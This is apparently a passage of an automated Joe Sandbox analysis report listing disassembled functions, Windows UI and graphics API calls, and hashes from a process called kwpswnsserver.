                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyWindow$Points$ClientH_prolog3_InflateOffset
                                                                  • String ID:
                                                                  • API String ID: 302641110-0
                                                                  • Opcode ID: 53b387b58047f8964680bf187d42abc6e90db455fda9bbfd2e57e4e32e5b166f
                                                                  • Instruction ID: 8fbd74a168b4c3d4b4450ed3ae3f2dc4979b8ad14d044e33a8dabacbe7704944
                                                                  • Opcode Fuzzy Hash: 53b387b58047f8964680bf187d42abc6e90db455fda9bbfd2e57e4e32e5b166f
                                                                  • Instruction Fuzzy Hash: 60127731A00619DFDF15CFA4CA44AEEBBB6FF4A304F144569E816BB740DB71A906CB90
                                                                  APIs
                                                                  • EnableMenuItem.USER32(?,0000420F,00000001), ref: 6C8B607C
                                                                  • EnableMenuItem.USER32(?,0000420E,00000001), ref: 6C8B6097
                                                                  • CheckMenuItem.USER32(?,00004214,00000008), ref: 6C8B60CB
                                                                  • CheckMenuItem.USER32(?,00004212,00000008), ref: 6C8B60DD
                                                                  • CheckMenuItem.USER32(?,00004213,00000008), ref: 6C8B60F0
                                                                  • EnableMenuItem.USER32(?,00004212,00000001), ref: 6C8B6112
                                                                  • EnableMenuItem.USER32(?,00004212,00000001), ref: 6C8B6141
                                                                  • EnableMenuItem.USER32(?,00004213,00000001), ref: 6C8B6150
                                                                  • EnableMenuItem.USER32(?,00004214,00000001), ref: 6C8B615F
                                                                  • EnableMenuItem.USER32(?,00004215,00000001), ref: 6C8B61B1
                                                                  • CheckMenuItem.USER32(?,00004215,00000008), ref: 6C8B61C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Enable$Check
                                                                  • String ID:
                                                                  • API String ID: 1852492618-0
                                                                  • Opcode ID: c2e1d3ebc2d24d265adfd4e05779ccdf787973bafba2038ffad20a8f412b3152
                                                                  • Instruction ID: 4ae03d7ab38300aa8cc21832064da48c2716157f02acf3a062841c19ba41ccf7
                                                                  • Opcode Fuzzy Hash: c2e1d3ebc2d24d265adfd4e05779ccdf787973bafba2038ffad20a8f412b3152
                                                                  • Instruction Fuzzy Hash: 7451CC70B4062AEFDB299F15CE45A59BBB0FF05B04F008665F919FB691D7709902CFA0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8C8DC7
                                                                  • GetCurrentThemeName.UXTHEME(?,000000FF,?,000000FF,00000000,00000000), ref: 6C8C8E1D
                                                                  • GetThemeColor.UXTHEME(00000000,00000001,00000000,00000EEF,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 6C8C8EE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Theme$ColorCurrentH_prolog3_Name
                                                                  • String ID: Aero$Luna$homestead$metallic$normalcolor$royale
                                                                  • API String ID: 2781885202-2881773410
                                                                  • Opcode ID: de08abf829ed947572c41af13e86eab0cfc2ab20b673501b659cfc7069b8d77a
                                                                  • Instruction ID: 46c60364f3b9f7a53d87e27b355d695331c438d0d1ab3cc785a48a08aafe904a
                                                                  • Opcode Fuzzy Hash: de08abf829ed947572c41af13e86eab0cfc2ab20b673501b659cfc7069b8d77a
                                                                  • Instruction Fuzzy Hash: 6A510671A4122DAEDB34CB24CD44BDE7679AF51328F040DE6E018B2A80DF31DED4CAA5
                                                                  APIs
                                                                    • Part of subcall function 6C8A56DD: __EH_prolog3_catch.LIBCMT ref: 6C8A56E4
                                                                  • GetModuleHandleW.KERNEL32(comctl32.dll,6C8FC88D,?,00000000,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC741
                                                                  • GetUserDefaultUILanguage.KERNEL32(?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC751
                                                                  • FindResourceExW.KERNEL32(00000000,00000005,000003EE,0000FC11,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC78F
                                                                  • FindResourceW.KERNEL32(00000000,000003EE,00000005,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC7AE
                                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,6C8AC784,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC7BA
                                                                    • Part of subcall function 6C8FC8CB: GetDC.USER32(00000000), ref: 6C8FC91E
                                                                    • Part of subcall function 6C8FC8CB: EnumFontFamiliesExW.GDI32(00000000,?,6C8FC8B5,?,00000000,?,?,?,?,?,00000000,00000000), ref: 6C8FC939
                                                                    • Part of subcall function 6C8FC8CB: ReleaseDC.USER32(00000000,00000000), ref: 6C8FC941
                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,0000001C,6C8AB5E1,?,?), ref: 6C8FC7EA
                                                                  • GlobalFree.KERNEL32(00000001), ref: 6C8FC862
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindGlobal$AllocDefaultEnumFamiliesFontFreeH_prolog3_catchHandleLanguageLoadModuleReleaseUser
                                                                  • String ID: MS UI Gothic$comctl32.dll
                                                                  • API String ID: 1488066090-3248924666
                                                                  • Opcode ID: c584c468303de0855fe27ec5443751bbc639553c7807d1f1145583f12a70333c
                                                                  • Instruction ID: 2665fca0e23704e9e583d13c1298597842b5b2d60030f6b7adb86253184430f5
                                                                  • Opcode Fuzzy Hash: c584c468303de0855fe27ec5443751bbc639553c7807d1f1145583f12a70333c
                                                                  • Instruction Fuzzy Hash: 2C41E531200629ABD7347A69CD48BBB37ACDF46758F108939F929CBF81DB30D9428661
                                                                  APIs
                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 6C890FF1
                                                                  • GetPropW.USER32(?,AfxOldWndProc423), ref: 6C891008
                                                                  • CallWindowProcW.USER32(?,?,00000110,?,?), ref: 6C891068
                                                                    • Part of subcall function 6C890E06: GetWindowRect.USER32(?,6C88168B), ref: 6C890E3F
                                                                    • Part of subcall function 6C890E06: GetWindow.USER32(?,00000004), ref: 6C890E5C
                                                                  • SetWindowLongW.USER32(?,000000FC,?), ref: 6C89108B
                                                                  • RemovePropW.USER32(?,AfxOldWndProc423), ref: 6C891097
                                                                  • GlobalFindAtomW.KERNEL32(AfxOldWndProc423), ref: 6C8910A2
                                                                  • GlobalDeleteAtom.KERNEL32(?), ref: 6C8910AC
                                                                    • Part of subcall function 6C890DE2: GetWindowRect.USER32(?,00000000), ref: 6C890DEF
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 6C8910F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catch_LongRemove
                                                                  • String ID: AfxOldWndProc423
                                                                  • API String ID: 3351853316-1060338832
                                                                  • Opcode ID: 8c392997db107ed6919e817f5b0c3113e18365699968227d29994432596d7ded
                                                                  • Instruction ID: 40e88eaf724ed71ba2f04602d1eedbe05f77611ab37fe6a7ccc96c57d5a0871a
                                                                  • Opcode Fuzzy Hash: 8c392997db107ed6919e817f5b0c3113e18365699968227d29994432596d7ded
                                                                  • Instruction Fuzzy Hash: 4A31A132905258BBCF25AFB89E588EE7E7DAF4E314B104A19F502A2A40DB31DA119760
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 6C888FA4
                                                                  • GetSystemMetrics.USER32(00000048), ref: 6C888FC6
                                                                  • CreateFontW.GDI32(00000000), ref: 6C888FCD
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 6C888FDB
                                                                  • GetCharWidthW.GDI32(00000000,00000036,00000036,6CA508DC), ref: 6C888FED
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 6C888FF9
                                                                  • DeleteObject.GDI32(00000000), ref: 6C889000
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 6C889009
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                  • String ID: Marlett
                                                                  • API String ID: 1397664628-3688754224
                                                                  • Opcode ID: fa87e49ea00251b3b1552d6a0372d31747ed361e4efd9a608a15365641ab0a48
                                                                  • Instruction ID: 8f30b4ae6a2e4bf9a8915bba7a99bd0edd30d6c3131d7b4f73585e387d5a05ac
                                                                  • Opcode Fuzzy Hash: fa87e49ea00251b3b1552d6a0372d31747ed361e4efd9a608a15365641ab0a48
                                                                  • Instruction Fuzzy Hash: 3F014F327017A27BD6356A668C5CE5B3E7CDBCBF59F208208F619E2580CA614802C771
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 619659579b6898efb668f19e4673e574c96a7b9495780dd8e895d7814afac29d
                                                                  • Instruction ID: 39ded044a0f082741c8e77444db665c96c4208d02c20429cfb3a58c7ec882473
                                                                  • Opcode Fuzzy Hash: 619659579b6898efb668f19e4673e574c96a7b9495780dd8e895d7814afac29d
                                                                  • Instruction Fuzzy Hash: 6E02DE31A40649DFCB25CFADCA90A9EB7B1FF4E314F108A69E915AB710D731AC41CB90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8E4245
                                                                  • GetSystemMetrics.USER32(00000004), ref: 6C8E427E
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000020), ref: 6C93BCFC
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000021), ref: 6C93BD06
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000005), ref: 6C93BD15
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(00000006), ref: 6C93BD1F
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(0000005C), ref: 6C93BD36
                                                                    • Part of subcall function 6C93BCCE: GetSystemMetrics.USER32(0000005C), ref: 6C93BD40
                                                                  • CreateCompatibleDC.GDI32(00000004), ref: 6C8E42B7
                                                                  • CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 6C8E42EE
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,00000001,00000000,00000000,00CC0020), ref: 6C8E4334
                                                                  • GetSystemMetrics.USER32(00000032), ref: 6C8E44A5
                                                                  • GetSystemMetrics.USER32(00000031), ref: 6C8E44B0
                                                                  • DrawIconEx.USER32(?,?,?,00000000,00000000,?,00000000,00000000,00000003), ref: 6C8E44FB
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834A3
                                                                    • Part of subcall function 6C883483: SelectObject.GDI32(?,00000000), ref: 6C8834B9
                                                                    • Part of subcall function 6C8E3EBB: GetTextColor.GDI32(?), ref: 6C8E3F00
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C8E45D6
                                                                  • BitBlt.GDI32(00000001,?,?,?,?,?,00000000,00000000,00CC0020), ref: 6C8E46E2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CompatibleCreateObjectSelect$BitmapColorDrawH_prolog3_IconOffsetRectText
                                                                  • String ID:
                                                                  • API String ID: 1542689876-0
                                                                  • Opcode ID: a1a1f12a26e4f9d2bed2f26028e74e8a201dddf2cafebece2faf3a975ebf4a64
                                                                  • Instruction ID: 758f07cf8bc085b941a4a0827fef7917e9a6f750d3c322bc8b43dcd302b6c9a0
                                                                  • Opcode Fuzzy Hash: a1a1f12a26e4f9d2bed2f26028e74e8a201dddf2cafebece2faf3a975ebf4a64
                                                                  • Instruction Fuzzy Hash: 50023471E00219DFCF25CFA8C944ADEBBB5FF89304F108569E919AB250DB71A946CF50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C9092D3
                                                                    • Part of subcall function 6C883E38: __EH_prolog3.LIBCMT ref: 6C883E3F
                                                                    • Part of subcall function 6C883E38: GetWindowDC.USER32(00000000,00000004,6C89E3DA,00000000), ref: 6C883E6B
                                                                  • GetClientRect.USER32(?,?), ref: 6C9092FD
                                                                  • GetWindowRect.USER32(?,?), ref: 6C909314
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A1), ref: 6C883F5F
                                                                    • Part of subcall function 6C883F50: ScreenToClient.USER32(?,6C8993A9), ref: 6C883F6C
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C909336
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 6C883954
                                                                    • Part of subcall function 6C88391D: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 6C883971
                                                                    • Part of subcall function 6C89BAAC: GetWindowLongW.USER32(?,000000EC), ref: 6C89BAB9
                                                                  • GetWindowRect.USER32(?,?), ref: 6C90938A
                                                                  • GetRgnBox.GDI32(?,?), ref: 6C9093A5
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C9093BF
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 6C9093D9
                                                                    • Part of subcall function 6C8839DF: ExtSelectClipRgn.GDI32(?,00000000,?), ref: 6C883A02
                                                                    • Part of subcall function 6C8839DF: ExtSelectClipRgn.GDI32(?,00000000,?), ref: 6C883A1B
                                                                  • OffsetRgn.GDI32(?,?,?), ref: 6C909414
                                                                  • OffsetRect.USER32(?,?,?), ref: 6C909435
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$ClipOffsetWindow$Client$ExcludeScreenSelect$CreateH_prolog3H_prolog3_IndirectLong
                                                                  • String ID:
                                                                  • API String ID: 3148124242-0
                                                                  • Opcode ID: a3c771e45c215447b148b3ebcec222ee56fce55da07a76b4c66886727598e483
                                                                  • Instruction ID: 407cce7202c5b910a0947eeb485ab7517002a7ea28fff315b6dbfc18dfa94a51
                                                                  • Opcode Fuzzy Hash: a3c771e45c215447b148b3ebcec222ee56fce55da07a76b4c66886727598e483
                                                                  • Instruction Fuzzy Hash: E0913E71E0022D9FCF15DFA8CD94AEEB7B9FF49308F154219E40AAB650EB34A945CB50
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 6C8C2A37
                                                                  • ScreenToClient.USER32(?,?), ref: 6C8C2A44
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2A83
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8C2AA8
                                                                  • KillTimer.USER32(0000EC16,0000EC16), ref: 6C8C2ADB
                                                                  • InvalidateRect.USER32(00000001,?,00000001), ref: 6C8C2AF3
                                                                  • InvalidateRect.USER32(00000001,?,00000001), ref: 6C8C2B05
                                                                  • KillTimer.USER32(00000000,0000EC15), ref: 6C8C2C6C
                                                                  • ValidateRect.USER32(00000000,00000000), ref: 6C8C2C99
                                                                  • RedrawWindow.USER32(00000000,00000000,00000000,00000185,00000000,00000000,00000000), ref: 6C8C2CD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow
                                                                  • String ID:
                                                                  • API String ID: 1459077570-0
                                                                  • Opcode ID: 72302d310ec24da828d3d18a9aa290b3342cfd4bc0db5cd8f0dba8ca1dbcb5b3
                                                                  • Instruction ID: 352e9621cf0116fa83bde300df56bdd71a0269e8d29f0c76ba344a0277a64ebd
                                                                  • Opcode Fuzzy Hash: 72302d310ec24da828d3d18a9aa290b3342cfd4bc0db5cd8f0dba8ca1dbcb5b3
                                                                  • Instruction Fuzzy Hash: 8E917171B0061AEFCB29DF78CA989ADF7B8FF49308F004665E415E3690DB34A951DB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Window$CaptureKillLoadParentRectReleaseTimerUpdate
                                                                  • String ID:
                                                                  • API String ID: 2135910768-0
                                                                  • Opcode ID: cc77db888525b3ab3c823514908cd09e1dd567ee39600a4715cf077c1739b296
                                                                  • Instruction ID: 641975349bded1ee80159adb8596a915d2b9af9822abc499dc6d28ef6a13600f
                                                                  • Opcode Fuzzy Hash: cc77db888525b3ab3c823514908cd09e1dd567ee39600a4715cf077c1739b296
                                                                  • Instruction Fuzzy Hash: 4371C931B0421A9FDF389FA9CA98BAEB775FB45704F154925E809E3A40D7387D028B54
                                                                  APIs
                                                                    • Part of subcall function 6C88B7C8: __EH_prolog3_catch.LIBCMT ref: 6C88B7CF
                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 6C932784
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 6C9327B9
                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 6C9327E4
                                                                  • LoadIconW.USER32(?,00000000), ref: 6C932819
                                                                  • LoadIconW.USER32(00000000,00007F00), ref: 6C93282C
                                                                  • GetClassLongW.USER32(?,000000F2), ref: 6C93285B
                                                                  • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6C9328E4
                                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 6C9328A6
                                                                    • Part of subcall function 6C8D14CE: __EH_prolog3_catch.LIBCMT ref: 6C8D14D8
                                                                    • Part of subcall function 6C8D14CE: CloseHandle.KERNEL32(00000000,?,00000000,00000080,6C932FD1,?,00000000,?,?,00000000), ref: 6C8D1513
                                                                    • Part of subcall function 6C8D14CE: GetTempPathW.KERNEL32(00000104,00000000,00000104,?,00000000,00000080,6C932FD1,?,00000000,?,?,00000000), ref: 6C8D1534
                                                                    • Part of subcall function 6C8D14CE: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000104,000000FF,?,?,00000000), ref: 6C8D1589
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C93299B
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C9329B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
• Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$H_prolog3_catchIconLoad$ClassCloseCreateFileHandleLongPathTemp
                                                                  • String ID:
                                                                  • API String ID: 2083023585-0
                                                                  • Opcode ID: 9b5ad83063620bb9a2de191073dc415ad248d0e4420000375ab6578747b2de22
                                                                  • Instruction ID: 1860b7212ff23396de14b9532e9d7bde50308b294e562d5e117be2ea802bbd3c
                                                                  • Opcode Fuzzy Hash: 9b5ad83063620bb9a2de191073dc415ad248d0e4420000375ab6578747b2de22
                                                                  • Instruction Fuzzy Hash: 2F71CE30301620AFDF299F24CD98BAA3B66BF45755F14017AFD19AB791DB30A801CFA0
